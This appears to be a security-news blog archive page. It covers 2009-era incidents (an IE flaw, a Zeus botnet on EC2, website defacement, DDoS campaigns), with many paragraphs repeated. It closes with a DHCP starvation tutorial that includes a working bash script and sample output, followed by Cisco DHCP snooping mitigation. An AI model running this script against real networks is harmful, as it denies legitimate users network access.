Microsoft announced yesterday that the cyber criminals who launched a large-scale assault on network security at multiple American firms did so via a vulnerability in the company's Internet Explorer browser software.
A security alert released by the company said that IE 6 installations running on some less commonly used versions of Windows were vulnerable, as well as IE 6, 7, and 8 installations on Windows XP, Vista, Server 2003/2008, and Windows 7. Microsoft has said that it is working on a solution and could release an off-cycle update to repair the vulnerability.
CNET reports that source code was stolen from over 30 U.S. firms targeted in the attack, including Adobe, Yahoo, Symantec, and Dow Chemical, though only Adobe has issued an official confirmation that it was attacked.
Experts say that setting IE's security features to maximum prevents the attack from gaining access to valuable personal or company data. According to PC Magazine, this implies the exploit targets IE's unprivileged context, outside of which it is unlikely to cause many problems.
Tag Archives: attack
Security flaw in IE used to target U.S. firms in cyber attack
Filed under Security News
Tagged as attack, Cyber, IE, off-cycle, patch, repair, update, vulnerability
Tagged as attack, Cyber, IE, off-cycle, patch, repair, update, vulnerability
Amazon cloud services attacked by zombie computers
The popular EC2 cloud hosting service operated by Amazon suffered a botnet attack last week, and it was revealed that the service was unwittingly playing host to a command-and-control unit for the malicious software.
A botnet formed by the infamous Zeus Trojan was found to have infected some of EC2's client sites, and spread to others through the cloud service provider. This resulted in several service outages last week, as it unfortunately coincided with power failures at an Amazon facility in northern Virginia.
Amazon told CNET that "When we find misuse, we take action quickly and shut it down...which we did in this case. Our terms of usage are clear and we continually monitor and work to make sure the services aren't used for illegal activity. We also take the privacy of our customers very seriously, and don't inspect their instances."
EC2 offers the type of highly customizable - and more importantly, scalable - cloud hosting solutions that proponents of the cloud model say will revolutionize the IT world. However, the controversy over security and reliability will only be fanned by last week's events.
A botnet formed by the infamous Zeus Trojan was found to have infected some of EC2's client sites, and spread to others through the cloud service provider. This resulted in several service outages last week, as it unfortunately coincided with power failures at an Amazon facility in northern Virginia.
Amazon told CNET that "When we find misuse, we take action quickly and shut it down...which we did in this case. Our terms of usage are clear and we continually monitor and work to make sure the services aren't used for illegal activity. We also take the privacy of our customers very seriously, and don't inspect their instances."
EC2 offers the type of highly customizable - and more importantly, scalable - cloud hosting solutions that proponents of the cloud model say will revolutionize the IT world. However, the controversy over security and reliability will only be fanned by last week's events.
Hacker attack forces shutdown of Michael Savage website
The website of controversial radio talk show host Michael Savage was forced to shut down for an hour on Saturday after a hacker infiltrated the site, according to WorldNetDaily.
WorldNetDaily reported that the hacker had broken in through a feedback portal and "damaged" the site. Savage, who has been placed on a list of banned people in the UK for spreading hatred, blamed Britain for the hack on his website.
Savage has been critical of the UK over the recent release of the convicted bomber of the flight over Lockerbie, Scotland, Abdelbaset Ali al-Megrahi, who has since returned to his native Libya.
"Why on the day of the worldwide furor over the release of the Lockerbie bomber by [British Prime Minister] Gordon Brown would Michael Savage's website be hacked?" Savage said, according to WorldNetDaily. "We cannot say who did this, but would it not be a possibility that the Brits themselves ordered this hack attack?"
Political hackers often use methods like a SQL injection attack to infiltrate web servers and post digital graffiti on websites.
Earlier this month, hackers broke into the websites of several members of the U.S. House of Representatives, replacing portions of their home pages with digital graffiti, according to the Washington Post Security Fix blog.
WorldNetDaily reported that the hacker had broken in through a feedback portal and "damaged" the site. Savage, who has been placed on a list of banned people in the UK for spreading hatred, blamed Britain for the hack on his website.
Savage has been critical of the UK over the recent release of the convicted bomber of the flight over Lockerbie, Scotland, Abdelbaset Ali al-Megrahi, who has since returned to his native Libya.
"Why on the day of the worldwide furor over the release of the Lockerbie bomber by [British Prime Minister] Gordon Brown would Michael Savage's website be hacked?" Savage said, according to WorldNetDaily. "We cannot say who did this, but would it not be a possibility that the Brits themselves ordered this hack attack?"
Political hackers often use methods like a SQL injection attack to infiltrate web servers and post digital graffiti on websites.
Earlier this month, hackers broke into the websites of several members of the U.S. House of Representatives, replacing portions of their home pages with digital graffiti, according to the Washington Post Security Fix blog.
Trojan used in DDoS attacks programmed to self-destruct
Filed under Security News
Tagged as attack, DDoS, programmed, SecureWorks, self-destruct, South Korea, trojan
Tagged as attack, DDoS, programmed, SecureWorks, self-destruct, South Korea, trojan
Trojan malware that was responsible for a series of cyberattacks on websites in the U.S. and South Korea last week was programmed by the attackers to erase the hard drives of the infected PCs used to launch distributed denial-of-service (DDoS) attacks, a web security researcher said.
Joe Stewart, director of malware research at SecureWorks, said the cyberattackers programmed the malware to download a program that overwrites the data on the hard drive with a message that reads "memory of the independence day," followed by as many "u" characters as it takes to write over the drive, the Washington Post's Security Fix blog reported.
The DDoS attacks, which began on July 4 and hit sensitive sites including the South Korean defense ministry and the U.S. Secret Service, disrupted government and commercial websites in at least three separate waves.
South Korean officials said Friday that the attacks used 86 IP addresses in 16 countries, including South Korea, the U.S. and Japan, but not North Korea, according to the Associated Press.
However, members of the South Korean parliament's intelligence committee told media Wednesday that the country's National Intelligence Service told them it believes North Korea or its sympathizers were responsible.
Joe Stewart, director of malware research at SecureWorks, said the cyberattackers programmed the malware to download a program that overwrites the data on the hard drive with a message that reads "memory of the independence day," followed by as many "u" characters as it takes to write over the drive, the Washington Post's Security Fix blog reported.
The DDoS attacks, which began on July 4 and hit sensitive sites including the South Korean defense ministry and the U.S. Secret Service, disrupted government and commercial websites in at least three separate waves.
South Korean officials said Friday that the attacks used 86 IP addresses in 16 countries, including South Korea, the U.S. and Japan, but not North Korea, according to the Associated Press.
However, members of the South Korean parliament's intelligence committee told media Wednesday that the country's National Intelligence Service told them it believes North Korea or its sympathizers were responsible.
Twitter used for DDOS attacks on Iranian sites
Filed under Security News
Tagged as attack, cyberattack, DDoS, denial of service, Iran, protests, Twitter, YouTube
Tagged as attack, cyberattack, DDoS, denial of service, Iran, protests, Twitter, YouTube
Tech-savvy Iranians have been using social networking sites such as Twitter and YouTube to transmit information about protests against that country's ruling regime since a disputed election on Friday.
But web security researchers say Twitter is now being used to launch distributed denial-of-service attacks on Iranian websites.
Richard Stiennon, founder of a Michigan-based IT security consultancy, said Twitter has been used recently to launch DDOS attacks on URLs inside Iran, including government sites of security forces.
Stiennon has spotted Twitter messages with embedded links that allow users to launch a DDOS simply clicking on the URL in the message, he told Computerworld.com.
Some commentators are cautioning that participating in the cyberattacks could end up backfiring and hurting Iranian dissidents.
Evgeny Morozov, a fellow at the Open Society Institute, blogged at the net.effect website of Foreign Policy magazine that the DDOS attacks could overwhelm Iran's networks, leaving the protesters without any communication with the outside world.
Everyone, it seems, is rushing to join the web-based support for Iranian protesters. Google announced that it had added Farsi to its translation service to help Farsi-speakers communicate to people in other languages and vice versa.
Spammers are also jumping on the bandwagon. Researchers spotted Twitter spam that includes keywords connected to the Iranian crisis to attract more attention, PC World reported.
But web security researchers say Twitter is now being used to launch distributed denial-of-service attacks on Iranian websites.
Richard Stiennon, founder of a Michigan-based IT security consultancy, said Twitter has been used recently to launch DDOS attacks on URLs inside Iran, including government sites of security forces.
Stiennon has spotted Twitter messages with embedded links that allow users to launch a DDOS simply clicking on the URL in the message, he told Computerworld.com.
Some commentators are cautioning that participating in the cyberattacks could end up backfiring and hurting Iranian dissidents.
Evgeny Morozov, a fellow at the Open Society Institute, blogged at the net.effect website of Foreign Policy magazine that the DDOS attacks could overwhelm Iran's networks, leaving the protesters without any communication with the outside world.
Everyone, it seems, is rushing to join the web-based support for Iranian protesters. Google announced that it had added Farsi to its translation service to help Farsi-speakers communicate to people in other languages and vice versa.
Spammers are also jumping on the bandwagon. Researchers spotted Twitter spam that includes keywords connected to the Iranian crisis to attract more attention, PC World reported.
DHCP starvation – quick and dirty
0
Overview
The DHCP starvation attack is quite simple to implement and therefore quite dangerous. It can be used to implement a denial of service attack in the local network, thus preventing legitimate clients from accessing network resource. In this article we will demonstrate how this attack can be deployed and later we will go through the steps necessary to mitigate it on Cisco equipment.
Scenario
The idea behind DHCP starvation is to make dummy leases for all IPs in the DHCP range. This will effectively cause a DoS, as all new network clients that request an IP address from the DHCP server, will not be served, as there will be no free IP addresses to lease. Depending on the lease time configured on the DHCP server, the effect of the attack will last as long as the time required for the leases to expire.
This attack can be automatically performed with yersinia, but for demonstration purposes we will use a quick and dirty script that only uses macchanger and dhclient.
macchanger is a great tool that just makes what it says in it’s name – it changes the MAC address of your network interface. dhclient on the other hand is the standard tool present in almost any Linux distribution, which is used for leasing an IP address from a DHCP server, and renewing the lease when necessary.
To the point – the following bash script demonstrates step by step the way that such attack works:
root@bt:~# cat starve.sh #!/bin/bash while true; do # kill all running dhcp clients - just in case killall dhclient rm -f /var/run/dhclient.pid # bring down the interface ifconfig eth0 down # change the MAC address of the interface and print the new MAC address macchanger -a eth0 2>&1 | grep Faked # bring the interface up ifconfig eth0 up # make a new DHCP lease dhclient eth0 2>&1 | grep DHCPACK done root@bt:~#
The results from running this script, besides causing a DoS attack (for which you will be personally responsible unless you are authorized to perform penetration testing of the network resources involved), will look much like this:
root@bt:~# ./starve.sh dhclient: no process killed Faked MAC: 00:0e:7b:63:fc:18 (Toshiba) DHCPACK of 192.168.123.207 from 192.168.123.1 Faked MAC: 00:30:63:ec:24:fb (Santera Systems, Inc.) DHCPACK of 192.168.123.208 from 192.168.123.1 Faked MAC: 00:0b:30:df:69:28 (Beijing Gongye Science & Technology Co.,ltd) Faked MAC: 00:0d:08:d3:d9:ad (Abovecable, Inc.) Faked MAC: 00:05:20:49:1f:5a (Smartronix, Inc.)^C root@bt:~#
When you stop seeing DHCPACKs, this means that you have depleted the available leases of the DHCP server.
Mitigation
When IP allocation is done through DHCP servers, DHCP snooping can be configured on the switches to only allow clients with specific IP/MAC addresses to have access to the network.
Use the following commands to configure DHCP snooping:
To enable DHCP Snooping on a Cisco IOS switch, follow these steps:
! To enables DHCP Snooping globally enter:
switch(config)# ip dhcp snooping
! To enable DHCP Snooping for specific VLANs enter:
switch(config)# ip dhcp snooping vlan
! To set the interface to trusted state, which will allow passing DHCP replies enter:
switch(config-if)# ip dhcp snooping trust
! To set a rate limit for DHCP Snooping enter:
switch(config-if)# ip dhcp snooping limit rate